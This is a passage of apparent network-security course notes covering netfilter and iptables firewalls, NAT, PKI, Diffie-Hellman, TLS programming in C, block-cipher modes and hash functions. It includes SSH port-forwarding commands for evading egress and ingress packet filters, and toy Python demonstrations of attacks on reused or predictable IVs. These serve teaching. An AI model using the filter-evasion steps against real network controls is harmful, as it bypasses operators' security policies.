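    return recv_exact(sock, length)

# A connected stream-socket pair stands in for the tunnel between A and B.
a, b = socket.socketpair()
send_packet(a, b"first packet")
send_packet(a, b"second")
print(recv_packet(b))
print(recv_packet(b))
a.close()
b.close()
```

Even if both packets arrive in a single TCP segment, the receiver recovers them one at a time.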

Linux Firewall

Three types of firewall
- Packet filter (stateless)
- Stateful firewall (able to monitor connections and other persistent information)
- Application/proxy firewall

The netfilter interface in Linux

The netfilter interface provided by Linux kernel allows one to insert high-performance firewall modules into Linux kernel.

The Makefile to compile kernel modules (assume the kernel module is kmod.c)

obj-m+=kmod.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

Operations of netfilter
- NF_ACCEPT: let the packet flow through the stack
- NF_DROP: discard the packet
- NF_QUEUE: pass the packet to user space via the nf_queue facility.
- NF_STOLEN: inform the netfilter framework to forget the packet. Further processing of this packet is left to the custom firewall module.
- NF_REPEAT: request netfilter to call this module again.
netfilter hooks
- SNAT is performed at POST_ROUTING

Sample firewall module based on netfilter

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/ip.h>
#include <linux/tcp.h>

static struct nf_hook_ops telnetFilterHook;

unsigned int telnetFilter(void *priv, struct sk_buff *skb,
                 const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct tcphdr *tcph;

  iph = ip_hdr(skb);
  tcph = (void *)iph+iph->ihl*4;

  if (iph->protocol == IPPROTO_TCP && tcph->dest == htons(23)) {
    return NF_DROP;
  } else {
    return NF_ACCEPT;
  }
}

int setUpFilter(void) {
        telnetFilterHook.hook = telnetFilter;
        telnetFilterHook.hooknum = NF_INET_POST_ROUTING;
        telnetFilterHook.pf = PF_INET;
        telnetFilterHook.priority = NF_IP_PRI_FIRST;

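        // Register the hook. Note: nf_register_hook() only exists on kernels
        // before 4.13; newer kernels use nf_register_net_hook(&init_net, ...).
        nf_register_hook(&telnetFilterHook);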
        return 0;
}

void removeFilter(void) {
        nf_unregister_hook(&telnetFilterHook);
}

module_init(setUpFilter);
module_exit(removeFilter);

MODULE_LICENSE("GPL");

iptables firewall

iptables is a frontend of netfilter which provides a lot of powerful functionalities.
The packet traversal graph of iptables

iptables Tables and Chains

Table	Chain	Functionality
filter	INPUT FORWARD OUTPUT	Packet filtering
nat	PREROUTING INPUT OUTPUT POSTROUTING	Modifying src/dst network address.
mangle	PREROUTING INPUT FORWARD OUTPUT POSTROUTING	Packet content modification.

Examples

Assume A’s IP is 10.0.2.5; B’s IP is 10.0.2.6.

Incrementing all incoming packets’ TTL by 5

 sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 5

Prevent A from doing telnet to B

 sudo iptables -t filter -A OUTPUT -p tcp --dport 23 -d 10.0.2.6 -j DROP

Prevent A from receiving telnet requests from B

 sudo iptables -t filter -A INPUT -p tcp --dport 23 -s 10.0.2.6 -j DROP

Prevent A from visiting an external website (assume the IP address of the website is 157.240.18.35)

sudo iptables -t filter -A OUTPUT -p tcp -m multiport --dports 80,443 -d 157.240.18.35 -j DROP

Evading packet filtering
- Evading egress filtering
  
  Suppose the second rule in the examples above (preventing A from doing telnet to B) is active. We can ssh into machine B and forward a local port to port 23 on B.
```
ssh -L 8000:localhost:23 seed@10.0.2.6
```
  Now, we can telnet to localhost’s port 8000 in order to telnet to machine B.
```
telnet localhost 8000
```
- Browsing another website
  
  Suppose the fourth rule in the examples above (blocking the external website) is active. In order to browse the website, we can ssh to machine B with dynamic port forwarding.
```
ssh -D 8000 -C seed@10.0.2.6
```
  In order to browse the blocked website, we can setup a SOCKS proxy in Firefox at 127.0.0.1:8000.
- Evading ingress filtering
  
  Suppose the third rule in the examples above (preventing A from receiving telnet requests from B) is active. From machine A, we can ssh to machine B with remote port forwarding:
```
ssh -R 8000:localhost:23 seed@10.0.2.6
```
  Now, on machine B, the user can telnet to his own 127.0.0.1:8000, and it will eventually reach machine A.
Connection based rules

Suppose we want to limit the number of TCP connections from a specific IP address. We can run:
```
sudo iptables -A INPUT -p tcp --syn --dport 80 -s 10.0.2.5 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset
```
This limits the number of simultaneous connections from 10.0.2.5 to port 80 to 1.

NAT: Network Address Translation

NAT is used to mitigate the shortage of IPv4 addresses.
DNAT (Destination NAT): used to publish a service located inside a private network. It’s called DNAT because the router effectively changes the destination IP address of arrived packets (to the mapped machine’s address). DNAT is also called port forwarding.
SNAT (Source NAT): used to allow machines inside a private network to talk with outside servers. It’s called SNAT because the router effectively changes the source IP address of arrived packets (to its own address).

SNAT Example

Role	VM IP
A	10.0.2.5
G (Gateway)	10.0.2.6, 192.168.60.1
B	192.168.60.101

Without SNAT, B cannot reach A. To set up a SNAT, on G, we run:

sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o enp0s3 -j SNAT --to-source 10.0.2.6

Basically, the source address of B's outgoing packets will be changed to 10.0.2.6. On the gateway, a specific port is associated with machine B so that when the reply comes back, it will be forwarded to B instead of other machines.

DNAT Example

Suppose I want to telnet from A to B. Without DNAT, A cannot reach B. We can set up a DNAT on G to forward G’s port 8000 to B’s port 23:

sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 192.168.60.101:23

Load balancing with DNAT

Another purpose of DNAT is to achieve load balancing, because a port on G can be mapped to multiple destinations. For example, we can set up a hypothetical load balancing application that forwards packets to different ports of B:
```
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability .50 -j DNAT --to-destination 192.168.60.101:9000
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability 1.0 -j DNAT --to-destination 192.168.60.101:9001
```
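The second rule has probability 1.0 because the rules are evaluated in order: the second rule only sees the packets that the first rule did not match. The actual share of a rule is its own probability multiplied by the fraction of traffic left unassigned by the earlier rules. Therefore, each rule has a 50% chance.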
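The same reasoning extends to more than two destinations. The sketch below computes which `--probability` value each rule needs so that every destination receives an equal share; the function names `rule_probabilities` and `effective_shares` are made up for this example.

```python
def rule_probabilities(n):
    """--probability value for each of n ordered rules so every rule gets 1/n."""
    # Rule i only sees traffic not matched by rules 0..i-1, so it must take
    # 1/(n - i) of what is left.
    return [1 / (n - i) for i in range(n)]

def effective_shares(probs):
    """Fraction of all traffic that each rule actually receives."""
    shares, remaining = [], 1.0
    for p in probs:
        shares.append(remaining * p)  # this rule's share of the total
        remaining *= 1 - p            # traffic left for later rules
    return shares

print(rule_probabilities(2))         # [0.5, 1.0]
print(effective_shares([0.5, 1.0]))  # [0.5, 0.5]
print(rule_probabilities(3))
print(effective_shares(rule_probabilities(3)))
```

For three destinations the rules would use probabilities of one third, one half and 1.0, and each destination again ends up with an equal share.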

PKI (Public Key Infrastructure)

Public-key cryptography

Briefly speaking, public-key cryptographic algorithms have a public key p and private key e. Anyone can encrypt data with p, but only the holder of e can decrypt. Conversely, the holder of e can encrypt a message with e, and anyone that has p can decrypt the message. This implies that:
- Encryption and decryption are one-way: without corresponding keys, given ciphertext, it is difficult to get the plaintext; given plaintext, it is difficult to get the ciphertext.
- Anyone can transfer information to the holder of e securely. Only the holder of e can decrypt the message.
- The holder of e can prove a message is indeed sent from him by sending the message and another version of the message encrypted with e. The receiver can verify the author by comparing the decrypted message and the actual message. (This is known as digital signature.)
Diffie-Hellman key exchange

DH allows two parties to exchange a secret key securely. Suppose there are two sides A and B, then:
1. A and B agree on a large prime $p$ and a generator $g$ (a small integer such as 2 or 5). Both values are public.
2. A picks a random positive integer $x < p$ and sends $g^x \bmod p$ to B.
3. B picks a random positive integer $y < p$ and sends $g^y \bmod p$ to A.
4. Both A and B can compute the shared secret $K = g^{xy} \bmod p$: A computes $(g^y)^x \bmod p$ and B computes $(g^x)^y \bmod p$.
An outsider will not be able to get $K$ because he does not know $x$ or $y$, and recovering them from $g^x \bmod p$ or $g^y \bmod p$ is the discrete logarithm problem.
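The exchange can be tried out with Python's built-in modular exponentiation. This is a toy sketch: the modulus 23 and generator 5 are assumed values chosen for readability, whereas real deployments use primes of 2048 bits or more. The function name `dh_keypair` is made up for this example.

```python
import secrets

# Toy public parameters, for illustration only.
p = 23  # prime modulus
g = 5   # generator

def dh_keypair():
    """Pick a random private exponent and derive the public value."""
    private = secrets.randbelow(p - 2) + 1  # 1 <= private <= p - 2
    public = pow(g, private, p)             # g^private mod p
    return private, public

x, A_pub = dh_keypair()  # A keeps x secret and sends A_pub to B
y, B_pub = dh_keypair()  # B keeps y secret and sends B_pub to A

k_a = pow(B_pub, x, p)   # A computes (g^y)^x mod p
k_b = pow(A_pub, y, p)   # B computes (g^x)^y mod p
print(k_a == k_b)        # True: both sides hold the same K
```

Only the public values cross the network; neither private exponent is ever transmitted.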
Man-In-The-Middle (MITM) Attack

Although the combination of public-key cryptography and DH seems secure, it is susceptible to MITM attacks. That is to say, an attacker M can talk with A and B at the same time, tricking each party into thinking that M is the other side. In this way, M can steal the secret. PKI is intended to defeat the MITM attack.
- An example: A and B intend to talk directly. However, M can intercept their traffic, which makes the connection look like A⟷M⟷B.
  1. M intercepts the public key sent from A to B and sends his own public key to B instead.
  2. When B wants to send something to A, B will encrypt the message with M’s public key.
  3. M can decrypt the message and encrypt it again with A’s public key.
  4. M sends the message to A.
  Neither party will be able to spot M, and their traffic is completely compromised.
How PKI defeats MITM attack
- Two key components in PKI
  - Digital Certificates: A digital certificate is a document that proves the ownership of the public key mentioned in the certificate. Digital certificates are signed by CAs, who certify the ownership of the public keys they contain.
  - Certificate Authority (CA): they are responsible for verifying the identity of users and providing them with signed digital certificates.
- The certificates (public keys) of CAs are already installed in operating systems and browsers. This is the root of trust.
- If the attacker…
  - Creates a fake certificate: the certificate cannot be signed by a trusted CA. Therefore, it will not be accepted by browsers.
  - Forwards the real certificate: the validation will pass in browser. However, the session key will be encrypted with the real certificate’s public key afterwards. The attacker will be unable to get the session key, and the actual traffic stays encrypted.
  - Uses his own certificate: the common name of the attacker’s own certificate will differ from that of the attacked website. Therefore, it will not be accepted by browsers.

How to create a self-signed CA and issue certificates

Generate public/private key pairs for the CA

openssl req -x509 -newkey rsa:4096 -sha256 -keyout key.pem -out cert.pem

Generate public/private key pairs for a server

openssl genrsa -aes128 -out server_key.pem 2048

Generate certificate signing request

openssl req -new -key server_key.pem -out server.csr -sha256

Sign the certificate on CA side

openssl ca -in server.csr -out server_cert.pem -md sha256 -cert cert.pem -keyfile key.pem

Deploy the certificate on the server side

Combine the private key and the certificate into a single file

cp server_key.pem server_deploy.pem
cat server_cert.pem >> server_deploy.pem

Test the certificate with openssl test server

openssl s_server -cert server_deploy.pem -accept 4433 -www

TLS: Transport Layer Security

The goal of TLS is to guarantee:
- Confidentiality: no other parties can see the actual content of communication.
- Integrity: if data are tampered with by others, the channel should be able to detect it.
- Authentication: at least one end of the channel should be verified.

TLS Programming

Sample client

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/err.h>


#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CA_DIR "ca_client"

int verify_callback(int preverify_ok, X509_STORE_CTX *x509_ctx)
{
    char  buf[300];

    X509* cert = X509_STORE_CTX_get_current_cert(x509_ctx);
    X509_NAME_oneline(X509_get_subject_name(cert), buf, 300);
    printf("subject= %s\n", buf);

    if (preverify_ok == 1) {
       printf("Verification passed.\n");
    } else {
       int err = X509_STORE_CTX_get_error(x509_ctx);
       printf("Verification failed: %s.\n",
                    X509_verify_cert_error_string(err));
    }

    return preverify_ok;
}

SSL* setupTLSClient(const char* hostname)
{
    // Step 0: OpenSSL library initialization
   // This step is no longer needed as of version 1.1.0.
   SSL_library_init();
   SSL_load_error_strings();
   SSLeay_add_ssl_algorithms();

   SSL_METHOD *meth;
   SSL_CTX* ctx;
   SSL* ssl;

   meth = (SSL_METHOD *)TLSv1_2_method();
   ctx = SSL_CTX_new(meth);

   SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
   if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){
	printf("Error setting the verify locations. \n");
	exit(0);
   }
   ssl = SSL_new (ctx);

   X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
   X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);

   return ssl;
}


int setupTCPClient(const char* hostname, int port)
{
   struct sockaddr_in server_addr;

   // Get the IP address from hostname
   struct hostent* hp = gethostbyname(hostname);
   if (hp == NULL) {
      fprintf(stderr, "Cannot resolve %s\n", hostname);
      exit(1);
   }

   // Create a TCP socket
   int sockfd= socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

   // Fill in the destination information (IP, port #, and family)
   memset (&server_addr, '\0', sizeof(server_addr));
   memcpy(&(server_addr.sin_addr.s_addr), hp->h_addr, hp->h_length);
//   server_addr.sin_addr.s_addr = inet_addr ("10.0.2.14");
   server_addr.sin_port   = htons (port);
   server_addr.sin_family = AF_INET;

   // Connect to the destination and stop if the connection fails
   if (connect(sockfd, (struct sockaddr*) &server_addr,
               sizeof(server_addr)) < 0) {
      perror("connect");
      exit(1);
   }

   return sockfd;
}


int main(int argc, char *argv[])
{
   char *hostname = "yahoo.com";
   int port = 443;

   if (argc > 1) hostname = argv[1];
   if (argc > 2) port = atoi(argv[2]);

   /*----------------TLS initialization ----------------*/
   SSL *ssl   = setupTLSClient(hostname);

   /*----------------Create a TCP connection ---------------*/
   int sockfd = setupTCPClient(hostname, port);

   /*----------------TLS handshake ---------------------*/
   SSL_set_fd(ssl, sockfd);
   int err = SSL_connect(ssl); CHK_SSL(err);
   printf("SSL connection is successful\n");
   printf ("SSL connection using %s\n", SSL_get_cipher(ssl));

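   /*----------------Send/Receive data --------------------*/
   char buf[9000];
   char sendBuf[200];
   // HTTP requires CRLF line endings; "Connection: close" lets the read loop end
   snprintf(sendBuf, sizeof(sendBuf),
            "GET / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n", hostname);
   SSL_write(ssl, sendBuf, strlen(sendBuf));

   int len;
   // SSL_read returns <= 0 on error or shutdown, so check before indexing buf
   while ((len = SSL_read (ssl, buf, sizeof(buf) - 1)) > 0) {
     buf[len] = '\0';
     printf("%s\n",buf);
   }
   return 0;
}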

Sample server

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }

int  setupTCPServer();                   // Defined below
void processRequest(SSL* ssl, int sock); // Defined below

int main(){

  SSL_METHOD *meth;
  SSL_CTX* ctx;
  SSL *ssl;
  int err;

  // Step 0: OpenSSL library initialization
  // This step is no longer needed as of version 1.1.0.
  SSL_library_init();
  SSL_load_error_strings();
  SSLeay_add_ssl_algorithms();

  // Step 1: SSL context initialization
  meth = (SSL_METHOD *)TLSv1_2_method();
  ctx = SSL_CTX_new(meth);
  SSL_CTX_set_verify(ctx, SSL_VERIFY_NONE, NULL);
  // Step 2: Set up the server certificate and private key
  SSL_CTX_use_certificate_file(ctx, "./cert_server/server-cert.pem", SSL_FILETYPE_PEM);
  SSL_CTX_use_PrivateKey_file(ctx, "./cert_server/server-key.pem", SSL_FILETYPE_PEM);
  // Step 3: Create a new SSL structure for a connection
  ssl = SSL_new (ctx);

  struct sockaddr_in sa_client;
  socklen_t client_len;
  int listen_sock = setupTCPServer();

  while(1){
    client_len = sizeof(sa_client);  // accept() expects the buffer size on input
    int sock = accept(listen_sock, (struct sockaddr*)&sa_client, &client_len);
    if (fork() == 0) { // The child process
       close (listen_sock);

       SSL_set_fd (ssl, sock);
       int err = SSL_accept (ssl);
       CHK_SSL(err);
       printf ("SSL connection established!\n");

       processRequest(ssl, sock);
       close(sock);
       return 0;
    } else { // The parent process
        close(sock);
    }
  }
}


int setupTCPServer()
{
    struct sockaddr_in sa_server;
    int listen_sock;

    listen_sock= socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    CHK_ERR(listen_sock, "socket");
    memset (&sa_server, '\0', sizeof(sa_server));
    sa_server.sin_family      = AF_INET;
    sa_server.sin_addr.s_addr = INADDR_ANY;
    sa_server.sin_port        = htons (4433);
    int err = bind(listen_sock, (struct sockaddr*)&sa_server, sizeof(sa_server));
    CHK_ERR(err, "bind");
    err = listen(listen_sock, 5);
    CHK_ERR(err, "listen");
    return listen_sock;
}

void processRequest(SSL* ssl, int sock)
{
    char buf[1024];
    int len = SSL_read (ssl, buf, sizeof(buf) - 1);
    if (len <= 0) {  // error or closed connection: nothing to answer
        SSL_free(ssl);
        return;
    }
    buf[len] = '\0';
    printf("Received: %s\n",buf);

    // Construct and send the HTML page
    char *html =
	"HTTP/1.1 200 OK\r\n"
	"Content-Type: text/html\r\n\r\n"
	"<!DOCTYPE html><html>"
	"<head><title>Hello World</title>"
	"<style>body {background-color: black}"
	"h1 {font-size:3cm; text-align: center; color: white;"
	"text-shadow: 0 0 3mm yellow}</style></head>"
	"<body><h1>Hello, world!</h1></body></html>";
    SSL_write(ssl, html, strlen(html));
    SSL_shutdown(ssl);  SSL_free(ssl);
}

Q&A
- Which line of client code verifies the validity of server certificate?
  
  Answer: It’s the following lines of code:
```
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
   if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){
	printf("Error setting the verify locations. \n");
	exit(0);
}
```
  The SSL_VERIFY_PEER option enforces the certificate check. On the server side, this is usually SSL_VERIFY_NONE because most TLS clients do not have a certificate.
- How does the client guarantee that the server is the owner of the certificate?
  
  Answer: The server proves that it is the owner of the certificate by holding the private key that corresponds to the public key in the certificate. If the server does not have the correct private key, it cannot decrypt the pre-master secret that the client sends during the TLS handshake, and therefore cannot calculate the correct session key.
- Which line of client code verifies if the server is the intended server?
  
  Answer: it’s the common name check.
```
X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);
```
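- Which line of client code forces TLS handshake to stop if verification fails?
  
  Answer: It’s the SSL_CTX_set_verify call. With SSL_VERIFY_PEER and a NULL callback, as in the sample client, OpenSSL aborts the handshake when certificate verification fails. If the verify_callback function is registered as the third argument instead, its return value decides: it returns preverify_ok, which is 0 when verification has failed, and this stops the TLS handshake.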
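For comparison, the same three checks from the Q&A can be sketched with Python's standard `ssl` module. This is not the sample client above, only a rough analogue: `make_client_context` and `peer_subject` are hypothetical helper names, and the mapping to the OpenSSL calls in the comments is approximate.

```python
import socket
import ssl

def make_client_context(ca_dir=None):
    """Build a client context that verifies the server certificate and hostname."""
    ctx = ssl.create_default_context(capath=ca_dir)  # trusted CAs (system store by default)
    ctx.check_hostname = True            # roughly X509_VERIFY_PARAM_set1_host
    ctx.verify_mode = ssl.CERT_REQUIRED  # roughly SSL_VERIFY_PEER
    return ctx

def peer_subject(hostname, port=443):
    """Connect, run the TLS handshake, and return the certificate subject.

    The handshake raises ssl.SSLCertVerificationError if any check fails,
    so no application data is exchanged with an unverified server.
    """
    ctx = make_client_context()
    with socket.create_connection((hostname, port), timeout=10) as tcp:
        with ctx.wrap_socket(tcp, server_hostname=hostname) as tls:
            return tls.getpeercert()["subject"]

ctx = make_client_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED, ctx.check_hostname)
```

Calling `peer_subject("example.com")` needs network access, which is why the sketch only builds the context at module level.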

Case studies
- Usually, when a user connects to a server with TLS, the user provides the domain name of the server, and the IP address of the server is obtained via DNS. What if a user tries to connect to a server given only an IP address? Is it going to be secure?
  
  Answer: No! In this case the client has to learn the domain name some other way (e.g. by reverse DNS lookup), so both the domain name and the certificate can be provided by the attacker. As a result, the common name check can be defeated.
- Even if the IP is genuine, the approach above is still insecure, because an attacker can sniff your traffic, spoof the reverse DNS lookup result, and present their own certificate to the user. In this way, the attacker can decrypt your traffic.
  
  However, if you reach a server by its domain name, you force the other side to present a valid certificate with a matching common name. Usually, this is not feasible unless the other side is indeed the intended server.

Secret-key Encryption

Common ciphers
- Monoalphabetic substitution cipher (can be broken w/ frequency analysis)
- Polyalphabetic substitution cipher
- DES (key size=56 bits, block size=64 bits), AES (key size=128, 192, or 256 bits, block size=128 bits)
Attack models
- Ciphertext-only attack: the attacker only knows the ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Known-plaintext attack: the attacker knows some plaintext and its corresponding ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Chosen-plaintext attack: the attacker can choose a specific plaintext and obtain its corresponding ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
Encryption modes
- Electronic Codebook Mode (ECB)
  
  The problem with this encryption mode is the lack of diffusion across blocks: identical plaintext blocks result in identical ciphertext blocks, which means the structure of the plaintext can be leaked.
- Cipher Block Chaining (CBC)
  
  In this mode, decryption can be done in parallel if all ciphertext blocks are available. However, encryption cannot be done in parallel because the output of a ciphertext block depends on the previous one.
  
  The initialization vector (IV) is used to ensure that the same plaintext does not generate the same ciphertext. The IV is not considered a secret: it can be released without damage.
  - Question: Suppose that during transmission, the fifth bit of the second ciphertext block is corrupted. How much data will we lose? Answer: we will lose the entire second plaintext block as well as the fifth bit of the third plaintext block, because each plaintext block is the decryption of its own ciphertext block XORed with the previous ciphertext block.
- Cipher Feedback (CFB)
  
  This is similar to CBC. One important property of CFB is that we have turned a block cipher into a stream cipher, that is, we can do encryption and transmission bit by bit.
- Output Feedback (OFB)
  
  This mode is similar to CFB, except that the cipher output is fed into the next block before the XOR operation. Because the keystream does not depend on the data, it can be generated in advance without waiting for the plaintext. OFB also has the stream cipher property. It essentially uses a block cipher as a pseudo-random number generator.
- Counter Mode (CTR)
  
  Counter mode works with a nonce and a block counter. Since each block depends only on the nonce and its own counter value, both encryption and decryption can be done in parallel. Like the IV, the nonce does not necessarily need to be kept secret.
Modes that do not require padding: CFB, OFB, CTR (effectively stream ciphers)
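The ECB weakness and the CBC corruption question above can both be checked with a small experiment. The block cipher here is a toy 4-round Feistel network built from SHA-256, assumed purely for illustration (it is not DES or AES and must not be used for real encryption). All function names are hypothetical, and "fifth bit" is taken to mean the fifth most significant bit of the first byte.

```python
import hashlib

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    # Round function of the toy Feistel cipher (illustrative assumption).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]

def enc_block(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _round(key, i, right))
    return left + right

def dec_block(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _round(key, i, left)), left
    return left + right

def split(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb_encrypt(key, plaintext):
    return b"".join(enc_block(key, b) for b in split(plaintext))

def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for b in split(plaintext):
        prev = enc_block(key, xor(b, prev))   # chain in the previous ciphertext
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for c in split(ciphertext):
        out.append(xor(dec_block(key, c), prev))
        prev = c
    return b"".join(out)

key, iv = b"k" * 16, b"\x01" * 16
plaintext = b"A" * BLOCK * 4                  # four identical plaintext blocks

ecb = split(ecb_encrypt(key, plaintext))
cbc = split(cbc_encrypt(key, iv, plaintext))
print(len(set(ecb)), len(set(cbc)))           # distinct ciphertext blocks per mode

# Flip the fifth bit of the second ciphertext block, then decrypt.
damaged = bytearray(b"".join(cbc))
damaged[BLOCK] ^= 0x08
recovered = split(cbc_decrypt(key, iv, bytes(damaged)))
original = split(plaintext)
for i, (got, want) in enumerate(zip(recovered, original), start=1):
    print(i, xor(got, want).hex())            # all zeros means the block survived
```

ECB maps the four identical blocks to one repeated ciphertext block, while CBC hides the repetition. After the bit flip, block 2 decrypts to garbage, block 3 differs in exactly one bit, and blocks 1 and 4 are intact.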
Initialization Vectors and common mistakes

IVs are not necessarily secrets. However, this does not mean that we can select them at will. If we do not follow certain rules, this will result in severe security flaws. We discuss the following scenarios provided that the encryption key stays the same.
- Common mistake: using the same IV
  
  A basic requirement for an IV is uniqueness, which means no IV should be reused under the same key. For some cipher modes, reusing the IV can be catastrophic. In OFB, a static IV makes the encryption scheme vulnerable to a known-plaintext attack: if the IV is reused and the attacker knows one plaintext together with its ciphertext, the attacker can decrypt all other ciphertexts produced with that IV. That is because the output stream of OFB is always the same when the key and IV are identical.
- Common mistake: using predictable IV
  
  If the IV is predictable, it will create a security flaw in some encryption modes, e.g. CBC. Using a predictable IV makes CBC susceptible to a chosen-plaintext attack. There are three assumptions under this scenario:
  1. The IV used for the next message is predictable.
  2. CBC is used.
  3. The victim will encrypt any plaintext the attacker provides.
  Then the attacker can test a guess of what message was sent by the victim. He XORs his guessed plaintext with the previous IV and the predicted next IV, and asks the victim to encrypt the result. The next IV cancels out inside CBC, so the cipher input is the guess XORed with the previous IV, and the resulting ciphertext equals the previously observed ciphertext exactly when the guess is correct.
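Both IV mistakes can be reproduced in a short experiment. The function `E` below is a stand-in for the encryption direction of a block cipher, built from HMAC-SHA256 purely as an assumption for this sketch (it is not invertible, which is fine here because neither attack needs decryption). The messages, IV values, and helper names are hypothetical.

```python
import hashlib
import hmac

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def E(key, block):
    """Stand-in for a block cipher's encryption direction (assumption)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]

def ofb_encrypt(key, iv, plaintext):
    stream, state = b"", iv
    while len(stream) < len(plaintext):
        state = E(key, state)          # keystream depends only on key and IV
        stream += state
    return xor(plaintext, stream)

def cbc_encrypt_block(key, iv, block):
    """CBC encryption of a single-block message."""
    return E(key, xor(block, iv))

key = b"secret key known only to victim"

# Mistake 1: the same IV is reused in OFB.
iv = b"\x00" * BLOCK
known_p = b"Order: 100 units"
known_c = ofb_encrypt(key, iv, known_p)
secret_c = ofb_encrypt(key, iv, b"Launch at 9 a.m.")
keystream = xor(known_p, known_c)      # computed without the key
recovered = xor(secret_c, keystream)
print(recovered)

# Mistake 2: the next IV is predictable in CBC.
iv_prev = b"\x10" * BLOCK
iv_next = b"\x11" * BLOCK              # the attacker can predict this value
victim_c = cbc_encrypt_block(key, iv_prev, b"Yes".ljust(BLOCK))

def guess_matches(guess):
    crafted = xor(xor(guess.ljust(BLOCK), iv_prev), iv_next)
    # The victim encrypts the attacker's chosen plaintext under iv_next.
    return cbc_encrypt_block(key, iv_next, crafted) == victim_c

print(guess_matches(b"Yes"), guess_matches(b"No"))
```

In the second case the attacker never sees the key, yet learns whether the victim sent "Yes" or "No" simply by comparing ciphertexts.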

One-way Hash Function

What hash functions do: they generate a fixed length digest for a message of arbitrary length.
Properties of a cryptographic hash function

Denote the hash function by $h$.
- One-way: Given a hashed value $v$, it should be difficult to find a message $m$ such that $h(m)=v$.
- Collision resistant: It should be difficult to find two messages $m_1$ and $m_2$ such that $h(m_1) = h(m_2)$.
Case study: the number game

A and B both come up with a number. If the sum is even, then A wins; otherwise B wins.
- The dilemma: whoever reveals his number first loses, because the other side can then pick a number that makes the sum come out in his favor.
- Resolving the dilemma with a hash function
  1. A chooses his number and sends the hashed value of his number to B.
  2. When B acquires A’s hash value, B can disclose his number to A.
  3. After receiving B’s answer, A reveals his answer. B can verify A indeed chose this number by comparing the hash value.
  - This is fair for A because of the one-way property. Given the hash value, it is difficult for B to know what number was chosen by A.
  - This is fair for B because of the collision-resistant property. It is difficult for A to find multiple values that hash to the same value, so the value revealed in the third step is indeed the value A chose.
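The three steps can be sketched as a commit-and-reveal exchange. One detail here goes beyond the text and is an assumption of this sketch: A hashes the number together with a random nonce, since otherwise B could simply hash every small number and look for a match. The names `commit` and `check` are hypothetical.

```python
import hashlib
import secrets

def commit(number: int):
    """Return (commitment, nonce); only the commitment is sent in step 1."""
    nonce = secrets.token_bytes(16)    # added so small numbers cannot be brute-forced
    value = hashlib.sha256(nonce + str(number).encode()).hexdigest()
    return value, nonce

def check(commitment: str, number: int, nonce: bytes) -> bool:
    """Step 3: B recomputes the hash from what A revealed."""
    return hashlib.sha256(nonce + str(number).encode()).hexdigest() == commitment

a_number = 7
commitment, nonce = commit(a_number)   # step 1: A sends `commitment` to B
b_number = 4                           # step 2: B discloses his number
honest = check(commitment, a_number, nonce)        # step 3: A reveals number and nonce
cheating = check(commitment, a_number + 1, nonce)  # A tries to switch numbers
print(honest, cheating)
print("A wins" if (a_number + b_number) % 2 == 0 else "B wins")
```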
Common hash functions
- The Message Digest (MD) series: MD2, MD4, MD5
  
  MD2 and MD4 are severely flawed and should not be used. The collision-resistant property of MD5 is broken, yet it is still one-way.
- The Secure Hash Algorithm (SHA) series: SHA-1, SHA-2, SHA-3
How hash function works

Most hash functions use a similar construction structure called Merkle–Damgård construction. Input data is broken into blocks of fixed size, with a padding added to the last block. Each block and the output of the previous iteration are fed into a compression function; the first iteration uses a fixed value called IV as one of its inputs.

Notice that SHA-3 does not use this structure anymore.
Applications of hash functions
- Integrity verification
  
  If we change a bit in the message, its hash value would be completely different. Therefore, we can use the hash value to determine if a document/file has been modified or not.
- Committing a secret without telling it
  
  One can prove that he knows a specific secret without telling it. He can simply hash the secret and then disclose the hashed value. The one-way property makes it almost impossible for others to get the secret given the hashed value. The collision-resistant property makes it almost impossible to change the secret without being noticed after disclosing the hashed value.
- Password verification
  
